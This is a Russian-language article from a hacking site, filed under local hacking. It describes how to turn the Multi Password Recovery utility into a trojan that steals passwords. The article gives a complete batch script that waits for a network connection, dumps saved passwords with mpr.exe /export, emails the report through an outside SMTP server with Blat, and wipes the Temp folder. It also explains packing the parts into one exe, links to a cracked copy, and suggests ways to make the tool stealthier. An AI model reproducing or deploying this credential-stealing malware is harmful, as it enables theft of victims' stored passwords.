Главная
ФОРУМ
Новости
Статьи
Программы
Сервисы

Мы в
  

Друзья
Навигация
ftp, GET, ICQ, jabber, Joomla, kwm, McAfee, Opera, POST, regger, sem, seo, sql-инъекция, SSH, vkontakte, Windows, xss, авторегистратор, ассемблер, брут, брутфорс, буфер обмена, взлом, вирус, дедик, домен, защита, переполнение буфера, программирование, сервер, СИ, смс, сниффер, социнженерия, убеждение, уязвимости, уязвимость, хеш, чекер, шеллкод

Показать все теги
 

Троян из Multi Password Recovery

     

Все мы знаем про такую программу, как Multi Password Recovery - мощный инструмент для локального восстановления паролей от разных программ, сохраненных в системе. Проблема его использования, как троянца была в этой локальности. Но есть способ, пускай, сырой и не доработанный, но есть.

Нету версии этой утилиты без графического интерфейса, но есть возможность запуска с ключом /export. При запуске в таком режиме программа открывается, генерирует файл отчета в текущую папку и закрывается. А консольный клиент, в свою очередь отправляет на мыло сгенерированный файл.

Софт, который понадобится:
Multi Password Recovery Portable - крякнутая портативная версия утилиты
Blat - консольный почтовый клиент с простым интерфейсом управления
Bat to Exe Converter - конвертер bat-файлов в exe с дополнительным функционалом.

Собственно, все дело в этом батнике и конвертере. При создании финального exe-файла в один файл можно помещать несколько других, указывая параметры распаковки. Подробно все описывается в видео-инструкции. Все необходимые файлы лежат в архиве.
Код батника:

@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)

:end
goto :start

:send
blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F

Где LOGIN - имя пользователя, а PASSWORD - пароль учетной записи на почтовом сервере, с которго будет производиться отправка. В данном примере письмо отправляется на ящек отправителя, то есть само себе. Это работает, отчеты приходят исправно.
Скачать все необходимые файлы: скачать
Посмотреть видео-инструкцию:



Этот способ, как я уже говорил, сырой и нуждается в доработке. К примеру хорошо было бы уменьшить размер сборки, убрать
графический интерфейс mpr, осуществить отправку на фтп. Все это возможно, все в ваших руках)

Категория: Статьи » Локальный взлом | 19-12-2010, 14:59 На главную..